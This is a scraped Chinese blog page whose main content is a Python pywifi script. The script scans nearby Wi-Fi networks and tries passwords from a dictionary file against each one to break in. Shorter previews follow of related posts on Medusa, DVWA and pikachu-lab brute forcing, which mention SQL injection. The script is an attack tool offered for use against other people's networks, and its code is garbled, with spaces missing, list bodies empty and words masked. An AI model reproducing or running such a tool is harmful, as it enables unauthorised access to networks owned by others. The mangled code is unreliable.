2、然後用乙個密碼,遍歷所有ssid,嘗試能否連線上
3、密碼正確連線上後,會報錯退出程式,否則會一直執行下去
4、本指令碼沒有優化,執行時可能有bug
5、時間大概是2~3秒掃瞄乙個ssid,根據計算機的不同可以修改,但是時間間隔太短會出錯,比如正確的密碼卻因時間太短認為是錯誤的。
本部落格是學習 分分鐘搞定python破解無線wifi 這篇部落格然後根據自己的需求擴充改寫的,大家可以學習這位大神的部落格。
執行時的現象:
圖一:此處應該有一副
# coding:utf-8importtime #時間
importpywifi #破解wifi
frompywifiimportconst #引用一些定義
fromasyncio.tasksimportsleep
classpojie():
def__init__(self,path):
self.file=open(path,"r",errors="ignore")
wifi = pywifi.pywifi() #抓取網絡卡介面
self.iface = wifi.inte***ces()[0]#抓取第乙個無限網絡卡
self.iface.disconnect() #測試鏈結斷開所有鏈結
time.sleep(1) #休眠1秒
self.list=self.initialssidnamelist()
# 測試網絡卡是否屬於斷開狀態,
assertself.iface.status()in\
[const.iface_disconnected, const.iface_inactive]
defbies(self):
self.iface.scan() # 掃瞄
bessis = self.iface.scan_results()
list =
fordatainbessis:
returnlen(list), sorted(list, key=lambdast: st[1], reverse=true)
defgetsignal(self):
while true:
n, data = self.bies()
time.sleep(1)
ifnis not0:
returndata[0:10]
definitialssidnamelist(self):
ssidlist = self.getsignal()
namelist =
foriteminssidlist:
returnnamelist
defreadpassword(self,ssidname,mystr):
bool1=self.test_connect(mystr,ssidname)
iflen(mystr)<8:
return falseifbool1:
print("密碼+++++++++++++正確:"+mystr+" "+ssidname)
return trueelse:
print("密碼錯誤:"+mystr+" "+ssidname)
return falsedeftest_connect(self,findstr,ssidname):#測試鏈結
profile = pywifi.profile() #建立wifi鏈結檔案
profile.ssid =ssidname #wifi名稱
# profile.ssid ="netcore" #wifi名稱
profile.auth = const.auth_alg_open #網絡卡的開放,
profile.cipher = const.cipher_type_ccmp #加密單元
profile.key = findstr #密碼
self.iface.remove_all_network_profiles() #刪除所有的wifi檔案
tmp_profile = self.iface.add_network_profile(profile)#設定新的鏈結檔案
self.iface.connect(tmp_profile)#鏈結
time.sleep(2)
ifself.iface.status() == const.iface_connected: #判斷是否連線上
isok=trueelse:
isok=falseself.iface.disconnect() #斷開
time.sleep(1)
#檢查斷開狀態
assertself.iface.status()in\
[const.iface_disconnected, const.iface_inactive]
returnisok
defrun(self):
while true:
mystr = self.file.readline()
forssidnameinself.list:
ret=self.readpassword(ssidname,mystr)
ifret:
raisefileexistserror
def__del__(self):
self.file.close()
path=r"g:\download\6000常用密碼字典.txt"start=pojie(path)start.run()
medusa 暴力破解
medusa 美杜莎 和hydra 九頭蛇 差不多 科普下 medusa是支援afp,cvs,ftp,http,imap,ms sql,mysql,ncp netware nntp,pcanywhere,pop3,postgresql,rexec,rlogin,rsh,smb,smtp auth v...
DVWA Brute Force(暴力破解)
本系列文集 dvwa學習筆記 分析 isset函式在php中用來檢測變數是否設定 該函式返回的是布林型別的值,即true false 可以看到,伺服器只是驗證了引數login是否被設定,沒有任何的防爆破機制,且對引數username password沒有做任何過濾,存在明顯的sql注入漏洞。方法一利...
作業(暴力破解)
基於單單表的暴力破解 首先先把攔截關一下 因為我們要讓他傳輸資料,沒必要攔截,而且就算是intercept is off 這也不影響我們的burpsuit找到它 然後開啟pikachu訓練靶場,先輸入乙個隨便的賬戶和密碼,然後可以在歷史裡找到位址是127.0.0.1的資料報,找到剛剛輸入的賬戶和密碼...